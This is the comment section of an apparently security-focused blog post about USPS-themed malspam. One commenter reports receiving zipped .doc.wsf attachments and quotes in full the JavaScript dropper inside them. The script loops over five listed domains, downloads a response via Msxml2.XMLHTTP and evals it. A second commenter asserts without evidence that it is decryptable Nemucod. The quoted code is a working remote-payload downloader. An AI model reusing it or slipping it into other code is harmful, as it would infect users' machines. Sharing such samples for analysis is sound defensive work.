Leave a Reply

6 Comments on "Spoofed USPS unable to deliver malspam continues to deliver Locky, Kovter and other malware"

Notify of
avatar
10000
Sort by:   newest | oldest | most voted
Mark Edworthy
Guest
Mark Edworthy

In the last two days, I have received two e-mail, both containing a compressed zip file, containing a .doc.wsf file.

These mail where sent from different domains / e-mail addresses (gilbert.pennington@stagingpc.com and warren.butler@wijnvoorraad.nl) and both claimed that they represent USPS support management department.

As a IT support and network infrastructure administration professional (and also due to only working within a Linux / open source based environment), I decompress these files and had a look using Libreoffice (within a sandboxed based visualised computer, I do not own and refuse to use any Microsoft products, therefore do not use MS Word or any MS Windows operating system).

I can confirm that the file does contain what looks like some Javascript coding. The file contains the code as displayed below:

function rox() { return “7656238”; }; function
gag() { return “Msxml2.XMLHTTP”; }; var x = new
Array(“sabedoriaalternativa.pt”,”dcregs.org”,”inflation.us”,”acpu.com.br”,
“bilderbergska.org”); function rov() { return “counter”; } function cou() {
return “/”+rov()+”/?a=”; }; function fiv() { return “a”; }; function cay(z) { z
= z.split(rox()); z = z.join(fiv()); eval(z); }; function boe() { return
“&i=LZCbj-mu-KARAKsEbTN4GoA9ZAuPDVEoJkV1mzh4jkqy_tEsNBEm-r2H60bGCFIfnv-
4uYqgZur5ybTDSvVUW7Mt”; }; function htt() { return “http://”; }; function sut()
{ return “1D9Hq8gb1bfLs9C1J3HbGW3KVXTDrCdYd4&m=”; }; function tog(x) { return
htt() + x + cou() + sut() + rox() + boe(); }; for (var i=0; i<5; i++) { try {
var e = new ActiveXObject(gag()); e.open("GET", tog(x[i]), false); e.send(); if
(e.status == 200) { cay(e.responseText); break; }; } catch(e) { };
};

I am glad that I am an experienced IT professional that can easily identify spam mail (as well as being happy that I do not use MS Internet Explorer or MS Office – and therefore this script does not effect my workstation or any of my IT infrastructure).

Jesse
Guest
Jesse

THIS IS NOT LOCKY, IT IS A FAKE AND IS PRETENDING TO BE. IT IS STILL THE NEMUCOD RANSOMWARE AND STILL USES PHP – IT IS ALSO DECRYPTABLE

wpDiscuz
%d bloggers like this:

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close